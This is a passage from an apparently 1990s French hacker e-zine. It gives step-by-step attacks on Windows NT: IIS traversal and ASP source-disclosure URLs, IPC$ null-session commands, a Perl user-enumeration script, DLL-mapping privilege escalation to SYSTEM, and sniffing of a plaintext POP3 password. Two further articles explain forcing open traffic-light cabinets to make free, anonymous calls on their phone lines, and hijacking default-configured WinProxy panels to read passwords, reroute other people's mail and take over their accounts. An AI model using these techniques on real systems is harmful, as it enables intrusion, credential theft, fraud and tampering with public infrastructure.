2- Dans l'arbre de répertoire qui s'affiche selectionnez le répertoire System.
3- Dans le répertoire System sélectionnez le répertoire CurrentControlSet.
4- Dans le répertoire CurrentControlSet sélectionnez le répertoire Control.
5- Dans le répertoire Control sélectionnez le répertoire LSA.L'éditeur de registre
affichera la fenétre suivante:
6- Sélectionnez dans le menu Edit "New option"puis "DWORD Value".l'éditeur de
registre va ajouter une ligne vide a la liste de la clé.
7- Dans la ligne vide, entrez le nom AuditBaseObjects appuyer sur <ENTER>
8- Dans l'éditeur de registre clickez sur la nouvelle clé AuditBaseObjects.
L'éditeur de registre affichera la boite de dialogue de la DWORD Value.
9- Dans la le champs des valeurs changez la valeur de 0 à 1.Clickez sur OK.
Aprés cela l'éditeur de registre aura une nouvelle clé de registrequi permet au systéme
(si l'administrateur systéme a activé les audits sur les accés des objets)
les audits sur la base d'objets , comme pour des objets réguliers.
Note: l'utilisation abusive du systéme de log et des audit peut dégrader les performances
de votre systéme, aussi évaluez ce qui doit étre logué pour chaque serveur.
De plus Windows NT sauve les logs locallement sur le disque dur, ce qui implique
que si un hacker prend le controle de votre systéme les logs peuvent étre modifiés,
c est pour quoi il est préférable que les logs soient sauvés et centralisés sur un
serveur protégé.
+--------------------------------+
| 3rd PART: Travaux Pratiques |
| Level: include <disclaimer.h> |
+--------------------------------+
Attaques possibles contre un serveur NT:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Les paragraphes suivants montrent les différentes attaques qu'une personne peut tenter pour
pénétrer sur un réseau NT, ou renforcer sa situation au sein du réseau. D'autre part,
il n'y a pas d'index d'attaques. Il est clair que ce qui est important reste la
combinaison de toutes ces méthodes.
Vulnérabilité aux attaques TCP:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Grace a la façon dont Windows NT et NetBIOS appréhendent les paquets TCP, Windows NT est assez
résistant aux attaques basés sur le protocole TCP. La seule attaque que peut tenter un hacker
contre un serveur Windows NT est la "man-in-middle-attack ( ou "session hijaking attack" )
qui consiste a forcer le réseau a accepter l'ip du hacker comme une "trusted host".
En régle générale donc les réseaux Windows NT sont assez sécurisés au niveau des attaques
basé sur le protocomes TCP, exepté lorsque celle ci ont directement pour cible les ports
TCP ou UDP.
Denial Of Service:
-=-=-=-=-=-=-=-=-=-
Une attaque de type Denial Of Service est simplement le fait de rendre un service,
une workstation, serveur, ou un service bien spécifique out, c'est une des attaques les plus
communes contre un serveur, mais loin d'être la plus interéssante ... :]
Il y a plusieurs raisons a une attaque de ce type:
1- Le hacker a instalé un Trojan qui ne prendra effet qu'aprés un reboot du serveur.
2- Le Hacker espére couvrir ses traces (mauvaise idéé), ou veux couvrir une activité
du CPU (central processing unit) du serveur par un crash hazardeux.
3- Le hacker veux juste crasher le serveur. >S'appelle t'il Hacker ou Lamer ?
Pour trouver des DoS de toute sorte, Win32 Vs Win32, Linux Vs Win32 etc ...
Les archives de Genocide 2600 reste assez complètes. (packetstorm.genocide2600.com)
Internet Information Services (IIS):
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Soyons clair ! Via un serveur web, il est fort possible qu'on ne puisse pas rentrer sur
votre réseau, mais par contre il y a d'énorme chance d'obtenir des informations essentielles
sur votre système, voire un account ...
Tout d'abord, vous savoir quelle version de Server Web est utilisé, il y a plusieur outils.
L'adresse www.netcraft.com reste une bonne solution anonyme... Sinon vous pouvez toujours
vous connecter en telnet sur le port 80 (ou 8080 etc ...) et taper get * .
Cela vous renvoi une page le code d'une page HTML ainsi que les caractéristique du serveur
web. Vous pouvez toujours utiliser le tool 1nf0ze aussi ... =)
Commençons par le celebre Serveur Web de Microsoft, Internet Information Server.
Il est fournit d'office sur WorkStation/Server, ce qui explique donc qu'on le voit un peu
partout. Les versions actuelles sont bien moin buggés que les premiéres mais ne sont toujours
pas à l'abri de quelques trou de sécurité ...
Bien souvant les administrations des serveurs web, se font directement via le browser.
Pour les retrouver, il faut chercher les directory suivants /scripts/iisadmin,
/_vti_bin/_vti_adm, /iisadmin/isadmin, /issadmin ...
Rhino9 (rhino9.com), a mis au point un tool de base appellé grinder qui permet de rechercher
des repertoires particuliers sur des serveurs web.
D'autre part, ce qui est intéressant est de faire lister les files sur un serveur, come si
vous tapier directement files:\\c:\ . Ces lignes marche uniquement sur de vielle version
de IIS:
http://www.ducon.com/..\..
http://www.ducon.com/scripts..\..\scriptname
Si vous avez reussit a mettre un file, back door ou autre trojan grâce a un accés en écriture.
Vous êtes bloqué car vous ne pouvez pas l'executer. La bonne solution reste de le faire
faire via le serveur web.
http://www.ducon.com/scripts/toto.bat?&COMMAND1+?&COMMAND2
Si les bugs cités precedemment ne fonctionne plus, et si vous vous retrouver dans le cas:
Accés en ecriture mais pas en execution, comme c'est le cas via share bien souvent.
Placer vos propres scripts dans /scripts du server et executer vos commandes via le
serveur web. Attention tout de même au logs ;-)
Active Server Pages:
-=-=-=-=-=-=-=-=-=-=-
Les ASP sont en faire l'équivalent du CGI sous Unix en soit disant plus efficasse.
Ces script que l'on trouve avec l'extention .asp un peu partout sur le web,
reste de mini-application qui interface avec des soft Microsoft bien souvent comme
Access par exemple pour la gestion de base donnée.
Les scripts ASP reste dans files HTML ... les codes se trouve compris entre les
tags <% et %> .
Les ASP sont utiliser sous NT 4 / IIS 3.0 ou Win95/98 avec personnal web server avec
asp.exe .
Son principe de fonctionnement est simple:
1. Le client execute une requête: www.trouduc.com/default.asp
2. Le serveur execute le sscript asp en local, génere une page web et la transmet au client.
Donc, si vous faites un view sources, vous n'aurez que le résultat, et pas le script ASP.
Hors celui reste intéressant cart il contien souvent des infos sur le systèmes, et même
voir des authentifiactions pour des bases de données, donc des passwords. =)
Il existe différente méthode pour essayer de piquer un source ASP.
Selon les patch utilisé ces lignes de comandes peuvent marcher:
http://www.ducon.com/default%2easp
http://www.ducon.com/default%2e%41sp
http://www.ducon.com/default.asp::$DATA
http://www.ducon.com/shtml.dll?<filename>.asp
Sur personnal web server, faites un telnet sur le port 80 du serveur et tapez:
GET /default.asp. HTTP/1.0
Si tout va bien cela vous revoi le code ASP.
NetBios / NetBeui via TCP/IP:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
NetBios est un protocole trés simple développé par Microsoft au temps du bon vieux
Dos. IL est utilisé pour les ressources partagé ou autre comandes lié au réseaux
sous Windows. Son avantages est le fait qu'il s'empile trés bien avec le TCP/IP,
donc qui vous autorise à exécuter certainnes commandes via le net.
Les principales commandes restent:
nbtstat
net file
net share
net start/Stop
net use
net view
etc ...
Le groupe Rhino9 (www.rhino9.com) est auteur de plusieurs outils à ce sujet. "Legion" 2,
reste trés performant et vous propose de scanner tout un domaine de classe B/C,
qui montera directement les ressources accéssible de la machine distante.
Inter-Process Communication (IPC$):
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Si vous vous connecter à serveur via IPC$ vous obtenner une liste de partition supplémentaire
sur laquelle vous pourrez acceder directement s'il n y'a pas de mot de passe ou faire du
brute force avec NAT.
C:\>net view \\0.0.0.0
System error 5 has occurred.
Access is denied.
C:\>net use \\0.0.0.0\ipc$ "" /user:""
The command completed successfully.
C:\>net view \\0.0.0.0
Shared resources at \\0.0.0.0
Share name Type Used as Comment
-----------------------------------------------------------------------
Inetpub Disk
NETLOGON Disk Logon server share
www_pages Disk
The command completed successfully.
Windows NT Security Identifiers (SID) :
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Sur un système NT, des Security Indentifier (SID) sont générés pour chaque account ou groupe
de travail. Les SID sont uniques sur un système et obtenu sur ce
que l'on appelle "Authority".
Bien souvent il s'agit d'un domaine ... Et les explications continuront sous cet angle pour
faciliter la compréhension ...
Il y a des SID que l'on rencontre plus ou moins souvent, mais qui sont universel sur toute
les machines. Voila les plus importants ...
* SECURITY_NULL_SID_AUTHORITY: Groupe sans membres, souvent utilisé pour le SID d'un objet
inconnue.
* SECURITY_WORLD_SID_AUTHORITY: Le domaine (authority) est responsable du groupe "Everyone".
* SECURITY_LOCAL_SID_AUTHORITY: Valeur attribuer à un utilisateur qui à le droit de se logger
en local sur la machine.
* SECURITY_NT_AUTHORITY: C'est le plus important car il vous permettra d'avoir des informations
sur les accounts, groupe, domain, service etc ...
Attaque utilisant les SID2USER.EXE et USER2SID.EXE
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
L'objectif est de récupérer la liste des utlisateurs sur un serveur NT =) Donc d'avoir
accés au informations contenue dans SECURITY_NT_AUTHORITY ...
D'abord connectez vous à l'IPC$ de la machine remote comme vu précedemment.
Executer la commande:
>user2sid \\trouduc.com "Domain Admins"
Cela vous renvoit soit un message d'erreur comme: "LookupAccountName failed - no such account",
soit une chaine de caractére de la forme:
S-A-B-C-.....D.....-.....E....-....F.....-...G
Maintenant il faut utiliser la 2ème commande, sid2user.exe pour récupérer des noms
d'utilisateur ...
>sid2user \\trouduc.com B A ....D.... .....E.... ....F.... 1000
(non il n'y a pas de - sur la deuxième ligne de commande)
Recommencez en incrémentant le 1000 jusqu'a avoir "LookupSidName failed" ...
Voila un script perl qui automatise toutes opérations. Bien utile, surtout pour
l'incrémentation finalle du 1000 .. Vous avez besoin de perl.exe =)
#Created by Mnemonix 08/06/98
#
$target=$ARGV[0];
$password='""';
$user='""';
$break=0;
$n=0;
system ("cls");
print ("USERLIST\nCreated by Mnemonix\n11th of June 1998\n\n");
print ("Connecting to IPC\$ share on $target...\n");
$connect=system ("net use \\\\$target\\ipc\$ $password /user:$user");
if ($connect==0)
{
print ("Connected...\n\n");
print ("Getting the SID of the Guest account on $target\n");
system ("user2sid.exe \\\\$target Guest > u2s.tmp");
open (FILE , "u2s.tmp");
seek(FILE,6,0);
while ($break < 5)
{
$char = getc (FILE);
if ($char eq "-")
{
$char=" ";
@auth[$n]=$char;
$break++;
}
else
{
@auth[$n]=$char;
}
$n++;
}
close(FILE);
system ("del u2s.tmp");
#print ("This is auth 1: ");
#print @auth;
print ("\n\n");
open (HANDLE, ">temp.txt");
select (HANDLE);
print @auth;
close (HANDLE);
select (STDOUT);
open (AUTH, "temp.txt");
$line=<AUTH>;
print ("Retrieving userlist...the list of users will be stored\n");
print ("in a text file called $target.txt\n");
$count=1000;
while ($count < 1100)
{
system("sid2user \\\\$target $line $count >> $target.txt");
$count++;
}
close (AUTH);
system ("del temp.txt");
print ("\nCompleted");
system ("notepad $target.txt");
}
else
{
print ("No IPC\$ share available");
}
Hack de NT en local:
-=-=-=-=-=-=-=-=-=-=-
Une technique tres simple consiste a booter avec une disquette dos, monter la
partition NTFS avec 'ntfsdos.exe' et aller chercher le fichier de mot de passe.
Une autre, basé sur le même principe, peut se faire depuis Linux.
Comme c'est le cas dans mon univ, nous avons Linux/Nt en multiboot. On peut donc monter
la partition NTFS et aller chercher le fichier.
DLL Mapping exploit (L0pht):
Bon cet exploit reste assez cool, mais la encore vous avez besoin d'être physiquement
sur la machine. Son objectif: vous ouvrir une fenêtre dos "console", administrateur.
De plus il reste trés simple à mettre en place, vous avez besoin de quelque Dll
disponible sur www.l0pht.com . Une fois les files downloadées suivez les étapes :
1. Logger vous normalement.
2. Démarrer 2 fenêtre dos.
3. Dans une, Copiez c:\winnt\system32\kernel32.dll dans c:\temp\realkern.dll
Si vous n'avez pas les droits en écriture sur temp, éditer eggddll.def, modifier
les répertoire et recompilez.
4. Copiez hackdll.exe et eggdll.dll dans c:\temp
5-a. Effacez les c:\lockout s'il existe. (Quelqun serait il passé avant vous ?) =)
5-b. Executez (Désactive kernel32.dll):
c:\> cd \temp
c:\temp> hackdll -d kernel32.dll
6. Exécutez (Active le trojan)
c:\temp> hackdll -a kernel32.dll c:\temp\eggdll.dll
Attention: N'appuyez pas sur la touche et changer de fenetre dos.
7. Il faut lancer un subsystem POSIX, par exemple:
c:\temp> posix /c calc
8. Maintenant apparait quelques boites de dialogues, repondez comme indiquez ...
NON - "User is DOMAIN\$LOGNAME, Spawn Shell?"
NON - "User is \$HOME, Spawn Shell?"
YES - "User is NT AUTHORITY\SYSTEM, Spawn Shell?"
YES - "Winsta0"
YES - "Desktop"
Maintenant, une 3éme fenêtre dos apprait, écrit console. C'est la bonne ... =)
Quelques outils pour s'amuser en local:
NT Server c:\winnt\system32> usrmgr
NT Workstation c:\winnt\system32> musrmgr
On peut aussi aller s'amuser avec regedit, regedt32 ou net ... =)
D'autre part ce système peut vous aider à installer quelques applications si vous
aviez des droits un peu trop limité.
Sniffer de réseaux:
-=-=-=-=-=-=-=-=-=-
Les Hackers "sniffent" souvent un réseau avant de lancer une attaque contre celui-ci.
Lorsqu'un hacker "sniffe" un réseau, il intercepte et copie les paquets transittant par
le réseau, il analyse ensuite le contenu des paquets pour savoir s'ils contiennent des
informations qu'il pourrait utiliser pour en gagner l'accés.
Un des plus grand risque pour votre réseau venant d'une attaque au sniffeur peut provenir
de la version de votre LANMAN. En effet des vielles versions du LAN Manage renvoient les
passwords en clair a travers votre réseau ce qui signifie qu'un hacker peut intercepter un
password sans attaquer directement le systéme et sans avoir eu a se loguer comme user
normal. Windows NT 3.51 et plus utilisent une version de LANMAN qui envoie les passwords
encryptés.
Une personne peut aussi sniffer des protocoles traditionnels tels qe FTP ou telnet qui
envoient les passwords en clair. Il est souvent le cas que le password du FTP d'un user
soit le même que celui de son accompte,obligez vos utilisateurs a avoir des mots de passe
différents.
Utilisation de BUTTSniff.exe:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
C'est un produit de Cult of The Dead Cow. C'est un sniffer trés basique, mais
qui permet baucoup de chose. Pour vous montrer la puissance voila un petit exemple.
Un utilisateur check son mail avec eudora. Pour des raisons d'anonymat, certainnes
partis du log ont été enlevées =)
D:\>BUTTSniff -d 0000 test3.log p
----- Extrait de test3.log -----
TCP Length: 50 Source Port: 110 Target Port: 1028 Seq: 9A91FEAC Ack: 0017CE40
+OK Serveur POP3
Club-Internet front3.grolier.fr
TCP Length: 15 Source Port: 1028 Target Port: 110 Seq: 0019CD40 Ack: 9A91FF2D
Flags: PA Window: 8426 TCP ChkSum: 25129 UrgPtr: 0
USER jmdupont
TCP Length: 0 Source Port: 110 Target Port: 1028 Seq: 9A91FE2D Ack: 0019DD4F
Flags: A Window: 9112 TCP ChkSum: 41830 UrgPtr: 0
TCP Length: 37 Source Port: 110 Target Port: 1028 Seq: 0A91EF2D Ack: 0119CD48
Flags: PA Window: 9152 TCP ChkSum: 54538 UrgPtr: 0
+OK Password required for jmdupont...
TCP Length: 15 Source Port: 1028 Target Port: 110 Seq: 0019CE4F Ack: 9B92FF53
Flags: PA Window: 0489 TCP ChkSum: 6558 UrgPtr: 0
PASS luidgi1mario...
TCP Length: 0 Source Port: 110 Target Port: 1028 Seq: 9A01FD62 Ack: 00192D5E
Flags: A Window: 9712 TCP ChkSum: 40978 UrgPtr: 0
-----EOF-----
Résultat> L/P: jmdupont / luidgi1mario
Vous pouvez aussi capturer des authentification smbs, phase de login, authentification
sur des pages web, authentification sur des proxy etc ... car elle passe en clair sur
le réseau.
Si vous ne trouvez aucune interface lors du listing avec BUTTSniff, utilisez donc
l'exploit Mapping Dll et installer le sniffer via la fenêtre console ... la situation
se débloque ;)
+--------------------------------+
| 4th PART: Conclusion |
| Level: include <blablabla.h> |
+--------------------------------+
Conclusion:
-=-=-=-=-=-
D'abord j'espére que vous avez reussit a trouver le moindre caractère ascii d'informations
utiles ... et que les fautes d'orthgraphes ne vous ont pas creuvé les yeux ... =) Si ce n'est
pas le cas, vous êtes dans le même cas que moi ... Vous avez du soucil à vous faire *lol*
Si aprés tout ça vous décidez de changer votre serveur NT pour une station Unix voire
Linux .. Je vous comprend =) Mais bon, on dit toujours qu'une station secure est une station
enfermée dans un coffre fort et deconnecté de tout réseau ... A vous de voir ! :)
Sources:
-=-=-=-=-
The MHD (Rhino9), Phillipe Leca (CNRS), Lars Klander, Micro$oft,Technotronic,
Windows NT (Grand livre), Rhino 9 NT WarDoc, SID Readme, L0pht heavy industries,
All exploit/security arhives sites and our neuronnes :)
URL's:
-=-=-=-
www.rhino9.com
www.l0pht.com
www.phrack.com
www.technotronic.com
www.ntresearch.com
www.ntshop.net/security/
bugtraq@netscape.org 'ML
Remerciements:
-=-=-=-=-=-=-=-
Tout d'abord un grand merci à Cyberjunk sans qui ce projet n'aurais jamais
pu voir le jour ...
Merci :
au MHT CreW (QuickTrip, B-zero-dhidarma, Shivan, TheJoker, ZorglubZ ),
à Tac0s ( pHeAr le Ban 20 ! )à Rhino9,à G0LD^FKS,et à Natashaa ....
Elle est bonne hein ShiShi !!!
Shen-lun / shen_lun@hotmail.com
Un grand Merci a tous mes pots qui me supportent durant les longues matinées ou
je rale kar j'ai pas dormi, et Thanks au teknival, nomad, spiral , tektonic, facom
et autres tribes me permettant de me défoncer la tête tranquillement pour oublier
un peu mon écran ... :-)
Greets to : dcba,#cryptel,va2,aaah,drahiin,neodyme,bob and da ultime drugz tester und
bidouilleur "JiBus" ... Remerciements aux coders d'xploit acharné ... YOU rulez !
and YOU own the pla-NET ;) Go On =)
-cjunk / snipper@hotmail.com
PS: D'autre archives sur Unix,Nt,Phreak,Net at Nevroze...
(members.xoom.com/nevroze)
* LA JEUNESSE EMMERDE LE FRONT NATIONAL *
-Et bien d'autres politiciens aussi d'aileurs ;)
-======={ FIN }=======-
(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
(Nos amis les feux tricolores) 4.13 ( Vatoo (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)
NOS AMIS LES FEUX TRICOLORES
AVERTISSEMENT: Le texte qui va suivre n' est qu' une présentation
journalistique, il n'incite pas les lecteurs à utiliser ses informations.
Tout individu les utilisant de manière illégale dans son pays sera responsable
de ses actes. De plus, toute ressemblance entre les photos présentées et la
réalité ne serait que pure coïncidence. Le phreaking est très sévèrement
réprimé par les temps qui courrent dans notre pays.
Les feux tricolores sont devenus partie intégrante du paysage urbain actuel,
au même titre que les poteaux téléphoniques, électriques, ou les commutateurs FT.
Personne n' y prête jamais attention, et c' est bien dommage, car ces feux
"banals" renferment un trésor bien riche pour les phreakers français.
Sommaire:
1- Introduction
2- Ouverture des armoires
3- Ligne téléphonique
4- Télésurveillance et télégestion
5- Conclusion
1- Introduction
A proximité de tous les feux tricolores, à une dizaine de mètre au plus, se
situe une armoire, le plus souvent en plastique gris ou beige clair, rectangulaire,
d'environ 1 mètre de hauteur sur 1 mètre de largeur. Ces armoires servent à gérer
les feux en fonction de l'heure de la journée, du trafique routier, des capteurs de
piétons, ou des pannes éventuelles. Sur l' ensemble du territoire national, on
compte environ 40 000 carrefours. L' intérêt du système pour les phreakers est
l' emploi de la télésurveillance pour contrôler ces feux. La plupart des armoires
cachent une ligne téléphonique, avec prise et modem intégrés. Ce matériel sert
principalement à détecter automatiquement les pannes à distance, et dans certains
cas à programmer les feux (télégestion).
A Paris, il existe un système centralisé de régulation du trafic, dit Parcival
(Pilotage Automatique de la Régulation des Circulations dans le Val-de-Marne),
qui gère en temps réel la coordination des feux tricolores dans 550 carrefours
(266 sur RN et 284 sur RD) et stocke les informations provenant de 1000 capteurs de
trafic.
2- Ouverture des armoires
Il y a évidemment plusieurs types d' armoires pour les feux tricolores, qui
dépendent de l' importance des carrefours, des agglomérations, des régions.
L'ouverture de ces boîtiers est spectaculairement simple. Soit vous avez besoin
d' un passe EDF (voir CRYPTEL 2, article sur les cabines de aaah), soit d' un pied
de biche (ou de votre talent de crocheteur de serrures !). L'utilisation du pied de
biche n'est pas tellement contraignante, car les boitiers sont en plastique, et
forcer les portes ne les détruira pas (sauf si vous êtes vraiment un bourrin).
Il n' y a qu'à introduire le pied de biche dans la fente de la porte, au milieu
ou en haut (le mieux est le haut, car ils peuvent entre-ouvrir le haut,
tirer sur la porte vers le haut, et ainsi deboiter le bas..).
Il n'y a plus qu'à donner un bon coup de pied dans la porte pour la refermer avec
soin =).
Voir feu2.jpg, livré avec le zine.
3- Ligne téléphonique
Les modems sont auto-alimentés par la ligne téléphonique, ils sont même reliés à des
prises pour pouvoir tester la ligne.
Les feux possèdent leurs propres numéros de téléphones, qui sont généralement
inscris dans un coin du boitier, ou sur le carnet de bord du feu. Avec un téléphone
ou un modem, il est possible d'appeler absolument n' importe quel numéro sur le RTC,
c'est une ligne tout à fait ordinaire.
Les phreakers utilisent donc le plus souvent ces lignes pour se connecter sur des
services payants chers (minitel, 0836xx..), et surtout pour surfer sur le net
gratuitement et anonymement (vous imaginez la tete des flics s'ils découvrent qu'un
site s'est fait hacké par un feu rouge?). De nombreux carrefours sont tres peu
fréquentés la nuit, et les phreakers peuvent s'installer tranquillement dans une
voiture avec leur portable raccordé par une rallonge au boîtier des feux.
Voir feu0.jpg, livré avec le zine.
4- Télésurveillance et télégestion
Le système des feux tricolores est un système automatisé. Néanmoins, il n' est
pas infaillible, et des pannes peuvent naître à tout moment. L' utilité de la
télésurveillance est de détecter ces pannes de manière automatique et instantannee.
Les feux sont programmés pour appeler un PC, via le modem de leur armoire, pour leur
communiquer leur panne (feux éteints, à l' orange clignotant, mal paramétrés,..).
La télégestion est moins souvent utilisée que la télésurveillance ne l' est.
Elle permet de contrôler et programmer les feux à distance, du PC au modem de
l' armoire. Les logiciels utilisés par ces PC varient en fonction des entreprises
qui gèrent les feux, et des constructeurs. De même, les modems utilisés varient en
fonction des régions, et des constructeurs.
Voir feu3.jpg, livré avec le zine.
5- Conclusion
Nous vous présentons ainsi une nouvelle technique de beige boxing, exploitable partout
en France. Comptez le nombre de cabines en france. Comptez le nombre de carrefours.
Il y en a dix fois plus, c'est une source inépuisable! Si vous réussissez à récupérer
des informations sur les logiciels utilisés dans votre région, sur les entreprises qui
s'occupent de leur maintenance, ou des informations de ce genre, n'hésitez pas à nous
adresser un courrier: cryptel@excite.com.
Rédaction: vatoo
Recherches: dafalgan et vatoo
(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) WinProxy - Anonymat ) 4.14 ( Aaah@mail.dotcom.fr (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)
Devant la recrue de questions a propos des proxy sur le #chan.
Vu que je suis un fainéant qui aime pas répéter 14 000 fois
Etant donné que surfait anonyment c'est tres facile
J'ai décidé de faire un article sur le sujet "Jvais t'dire ouais" Avant de
commencer petit message personnel > "Jvais t'dire ouais" c'est bon on va
pouvoir commencer "Jvais t'dire ouais" (stop la c lourd :-)
Winproxy 1.4 et ses petits freres (l'en a 2 ou 3) c'est comme le dit tres
bien la doc commerciale: "une application 32 bits qui offre les services
d'un Firewall et d'un serveur de mail sur des stations équipées de Windows
95/98 ou Windows NT. Elle est facilement configurable à distance grâce à une
interface WWW. WinProxy supporte le plupart des services présents sur
Internet." En clair sa tache c'est de séparer une connexion internet pour
plusieurs machines. Il utilise 2 ports le 3128 (port de données) et le 3129
(le best c le port pour la config du proxy) Les protocoles supportés par le
logiciel sont les suivants:
HTTP (WWW)
FTP
GOPHER
SSL (HTTPS)
Telnet
NNTP
SMTP
POP3
SOCKS
Bon alors ce super logiciel qui est téléchargeable on http://www.winproxy.net
est config par défault, tout beau, tout monté avec tous les ports ouverts.
A croire que la documentation livrée avec est chiante/trop longue et que les
admins sont des fainéants (la y a un peu de vrai :) Donc ben vu que le proxy
est ouvert a tout va et qu'il nous offre des tonnes de possibilités bah on
va pas se gener pour s'en servir.
Pour commencer ta mission si tu l'acceptes (remarque t'a pas le choix si tu
veux que ça marche) c'est de prendre nmap ou WingateScan et de partir à la
peche aux IP. Attention ton scanner doit etre config pour chercher sur les IP
le port 3128 d'ouvert. Bon alors moi je suis pas radin et comme j'ai pas
envie de devoir filer des IP aux scanneurs perdus qui viendront sur le chan
je vous conseille de scanner ces plages:
195.146.100.1 jusqu'a 195.146.109.255
Vous allez voir la ils se sont tous filés rencard sur cette tranche d'ip
y a des ip fixes des dynamics a vous de trouver je vous mache pas
completement le boulot. Donc une fois qu'il aura trouvé des IP avec le port
3129 ouvert (c pas ce qui manque) ben vous allez pouvoir faire tout ce que
vous voulez
*/ Avant de continuer juste un peu d'infos ce proxy est open a tout le monde
si il est config par default par l'admin. Seulement si il est pas bete il
fermera 2, 3 trucs et vous ne pourrez pas tout faire marcher. Rassurez vous
sur les 50 becanes tournant avec Winproxy que g trouvé seulement 7 etant
config correctement ! :) Ca vous laisse une bonne marge /*
Du Web :
********
Vous voulez surfer "on the world wide web" anonyment sans vous faire log
votre IP provider. En gros pour shematiser à fond je vous fais une discution
entre 3 ordinateurs :
Ordinateur A: c'est vous
Ordinateur B: c'est l'ordi qui tourne avec WinProxy
Ordinateur C: c'est le serveur web de Mr X qui a un site qui vous intéresse
"Salut B c'est A j'aurais besoin de la page web de C"
"Ok A je la prends pour toi et je te l'envoie"
"Salut C c'est B j'ai besoin de ta page web"
"Ok B la voila"
"A c'est bon, C m'a envoyé la page je te la file"
On peut pas faire plus simple:-) NB quand B demande la page web il dit a C
que c'est pour lui il precise pas que c'est pour A donc anonymat.
Pour se faire aller dans le panneau de config de votre broswer, chercher
un truc avec Serveur PROXY entrer l'IP mettre le port 3128, relancer le
broswer et hop la now vous surfez sur le dos de la machine B
Du telnet (ou autres FTP, rlogin, ssh etc ...):
***********************************************
Ben vous vous connectez tout simplement sur le port 23 de votre IP et il va
vous sortir ceci
Enter : <host> [port] :
Bah la vous etes grand vous entrez votre ip est le port qui vous interresse
ex: A veut faire un telnet sur C
Il se connecte sur B (via le port 23) et entre 127.0.0.1 23
IP _____| |___ Port
Et booum connexion:)
ICQ, IRC, MAIL etc :
********************
Meme principe, je detaille pas parce que y a plein de particularités propres
a chaque trucs. Rappelez-vous bien cherchez toujours dans votre logiciel
une zone dans son panneau de config ou vous pouvez stipuler qu'il doit
se connecter via un proxy et/ou firewall
NB: Pour IRC il faut que le proxy est activé les ports SOCKS ce qui est
pas toujours le cas pour se faire descendez plus bas lisez le truc sur le
panneau de config ADMIN allé dans Configuration puis Network il doit y avoir
une ligne :
SOCKS server: [ ] Version 4 [ ]Version 5 Port:1080
Il suffit de cocher les cases et c'est bon.
Now the BEST > Le panneau de config ADMIN :
*******************************************
Le panneau de config WinProxy est géré par une interface WEB. En temps normal
seul l'admin peut y accéder seulement la config par default laisse libre
acces à tout le monde. Pour charger le panneau de config de l'admin c'est pas
compliqué vous prenez votre broswer est dans la zone URL vous entrez :
http://<IP>:3129
Il va de soi que le zone <IP> doit etre remplacé par un truc du style
198.55.46.15 Un fois ceci fait si tout se passe bien vous devez entrer
dans le panneau de config et pouvoir tout config à votre bon vouloir.
> CONFIGURATION
- Network = Vous pouvez ouvrir, fermer des ports
- Dial = Le provider ou il se connecte (procedure automatique) dans cette
page est stockés son login et password. Pour voir en clair son Pasword
editer le source de page HTML il écrit en clair dedans
- Cache = les log il note les ip et l'heure si vous voulez un max
d'anonymat vous pouvez effacer votre IP des logs
- Accounts = Comme son nom l'indique des accounts pour la messagerie
interne fournie avec le logiciel. Vous pouvez vous créer, delete, changer
les accounts
- Mail = Mode de routage du courrier avec ses "settings" (= la config)
Si des emails ont deja etait crées (souvent le cas avec des IP fixes vous
pouvez discretos rerouter le courrier de Mrx@toto.com sur la votre donc
recevoir du courrier anonyment)
- Access = La zone jamais config :-) qui permet d'interdire l'acces a des
inconnus au panneau de controle
- Security = ensemble d'options avancées
- Advanced = ensemble d'options avancées
- Info = fichier d'aide pour la config
- Restart = Redémarre le Proxy apres modification de la configuration
> CACHE
Stocke en mémoire les pages web visitées pour eviter d'avoir à les
recharger en permanence
> MANUAL
Comme son nom l'indique
> Logs
Le fichier qui surveille le trafic sur le
- Proxy
- Mail
- Dial
- Security
- Error
Les logs du Proxy sont tres interessants a regarder, ça nous permet de voir
les sites visités et eventuellement les password entrés pour ces site
> CURRENT USER
C'est le profil avec l/p de chaque user, les accounts sont gérés dans la
partie CONFIGURATION (ci dessus)
Voila autant dire que c'est drolement pratique :-) Je vous conseille de
trouver des IP fixes comme ça vous pouvez vous monter un ptit truc bien sympa
Je finirais mon article par une idée signalée dans BUGTRAQ :
De grands providers français tel que Wanadoo, Club-internet vous indiquent
via leur page portail web si vous avez du courrier. Pour cela ils identifient
via votre IP lorsque vous chargez la page web. Donc dans cette logique
si vous trouvez un Proxy (pas forcement celui cité ici) chez un utilisateur
de Club ou wanadoo, vous pouvez charger les pages des fournisseurs en
passant par le proxy ce qui vous permettra d'acceder au mail du mec à son
insu. Par la suite libre a vous d'essayer vu que vous avez le controle de
son email d'envoyer un mail a la hotline avec un baratin comme quoi vous
avez perdu votre mot de passe ... patati patata ...
Greets to : Vatoo, Cyberjunk, Drahiin, Neodyme, Rockme, Mikasoft, Larsen,
Goliath, #cryptel et ceux que j'ai oublié
Du veux du zine ? du pur zine ?
Jvais t'dire ouais
Aaah
Aaah@mail.dotcom.fr
(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Media Underground ) 4.15 ( Aaah@mail.dotcom.fr (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)
Le Monde, Libération, Canal+, TF1 ça y est c'est la tendance tout le monde
veut parler hacker. Et pour ça tous on la même recette en provenance du meme
moule :
[X] Un pirate (de preference jeune qui fait des révélations fracassantes)
